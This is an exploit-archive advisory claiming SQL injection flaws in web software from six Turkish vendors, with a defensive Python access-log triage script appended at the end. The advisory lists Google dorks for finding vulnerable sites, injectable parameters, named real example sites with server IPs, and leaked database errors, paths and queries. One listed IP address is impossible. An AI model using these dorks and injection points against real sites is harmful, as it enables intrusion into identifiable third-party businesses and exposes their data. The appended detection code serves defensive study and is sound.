
DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/01/2019
# Vendor Homepages of 6 Products :
1) devsoft.com.tr
2) btmbilisim.com ~ btmarge.com
3) algoritma.com.tr
4) mplusnet.com
5) webicerik.com
6) verisay.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# The products of 6 vendors suffer from remote SQL Injection vulnerabilities.
***************************************************************************

1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr

2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com

3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr

4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com

5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com

6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com

####################################################################

# Google Dorks for the Different Vulnerable Products :
********************************************

1) intext:''Web Yazılım: Devsoft''

2) intext:''Tüm hakları saklıdır. BTM ARGE.''

3) intext:''www.algoritma.com.tr"

4) intext:''Powered By M.Ceylan'' site:tr

5) intext:Webİcerik Kurumsal

6) intext:Verisay Web Tasarım

####################################################################

1) Web Yazılım Devsoft SQL Injection Vulnerability
********************************************

# Google Dork :
****************
intext:''Web Yazılım: Devsoft''

# SQL Injection Exploit :
**********************
/urunler.php?id=[SQL Injection]

/page.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] adabroker.com.tr/urunler.php?id=90%27

Note : (94.73.151.155) => There are 338 domains hosted on this server.

Note : (159.69.91.216) => There are 44 domains hosted on this server.

# SQL Database Error :
*********************
HATA : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

####################################################################

2) BTMArgeBilişim SQL Injection Vulnerability
****************************************

# Google Dork :
****************
intext:''Tüm hakları saklıdır. BTM ARGE.''

# SQL Injection Exploit :
**********************
/urun_detay.php?ID=[SQL Injection]

# Example Vulnerable Site :
************************
[+] habibmetal.com/urun_detay.php?ID=1'

Note : (213.128.66.82) => There are 543 domains hosted on this server.

Note : (35.243.133.12) => There are 2 domains hosted on this server.

# SQL Database Error :
**********************
Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12

####################################################################

3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
**********************************************************

# Google Dork :
****************
intext:''www.algoritma.com.tr"

# SQL Injection Exploit :
**********************
/urun.php?id=[SQL Injection]

/urunler.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] ozgordal.com.tr/urun.php?id=15%27

Note : (94.73.146.96) => There are 220 domains hosted on this server.

Note : (93.187.206.206) => There are 693 domains hosted on this server.

# SQL Database Error :
**********************
select * from yenilikler where id=15'

select * from kategoriler where id=6'

####################################################################

4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
**************************************************

# Google Dork :
****************
intext:''Powered By M.Ceylan'' site:tr

# SQL Injection Exploit :
**********************
/match.php?id_match=[SQL Injection]

/lig/consult/istatistik.php?equipe=[SQL Injection]

# Example Vulnerable Site :
************************
[+] alanyaspor.org.tr/match.php?id_match=871%27

Note : (31.169.73.251) => There is 1 domain hosted on this server.

Note : (31.169.73.242) => There are 58 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/alanyaspor/public_html/match.php on line 62

####################################################################

5) Webİcerik SQL Injection Vulnerability
************************************
# Google Dork :
****************
intext:Webİcerik Kurumsal

# SQL Injection Exploit :
**********************
/index.php?page=mod_video_goster&videoID=[SQL Injection]

/ENG/index.php?page=icerikgoster&menuID=[SQL Injection]

# Example Vulnerable Site :
************************
tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27

Note : (77.92.99.319) => 1 Domain.

Note : (77.92.99.31) => There are 13 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/tcma.org.tr/tcma.org.tr/ENG/lib/emit_icerik.php on line 323

####################################################################

6) Verisay Web Tasarım SQL Injection Vulnerability
*********************************************
# Google Dork :
****************
intext:Verisay Web Tasarım

# SQL Injection Exploit :
**********************
/urunler/urun_detay.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] irena.com.tr/urunler/urun_detay.php?id=1465%27

Note : (89.19.29.4) => There are 130 domains hosted on this server.

Note : (52.19.74.107) => There are 10 domains hosted on this server.

# SQL Database Error :
**********************
SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15

SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
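
# Added example (not part of the original advisory and not code from any listed vendor) :
Every URL pattern above passes an identifier in the query string, so a site owner can triage web access logs by flagging any request to a .php script where one of those parameters decodes to something other than digits. Assumptions: logs are in Apache/nginx "combined" format, all listed parameters are integer identifiers, and the log lines and client addresses below are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names from the advisory's URL patterns; treating every one of
# them as an integer identifier is an assumption of this example.
INT_PARAMS = {"id", "id_match", "equipe", "videoid", "menuid"}

# Client address, request target and status from a "combined" log entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+" (\d{3})')

def suspicious_params(target):
    """Return (name, decoded value) pairs where an integer parameter is not all digits."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".php"):
        return []
    return [(k, v) for k, v in parse_qsl(parts.query)  # parse_qsl percent-decodes
            if k.lower() in INT_PARAMS and not re.fullmatch(r"[0-9]+", v)]

def triage(lines):
    """Return (client, status, path, name, value) for every flagged request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request entry
        client, target, status = m.groups()
        path = urlsplit(target).path
        for name, value in suspicious_params(target):
            findings.append((client, int(status), path, name, value))
    return findings

# Constructed sample entries (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jan/2019:10:01:02 +0300] "GET /urunler.php?id=90 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [25/Jan/2019:10:01:09 +0300] "GET /urunler.php?id=90%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [25/Jan/2019:10:01:15 +0300] "GET /index.php?page=mod_video_goster&videoID=12%27 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Jan/2019:10:02:44 +0300] "GET /match.php?id_match=871 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Jan/2019:10:03:00 +0300] "GET /style.css?id=abc HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned 200 with an unusually small body is worth checking against the application's error log for the database error messages shown in the sections above.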
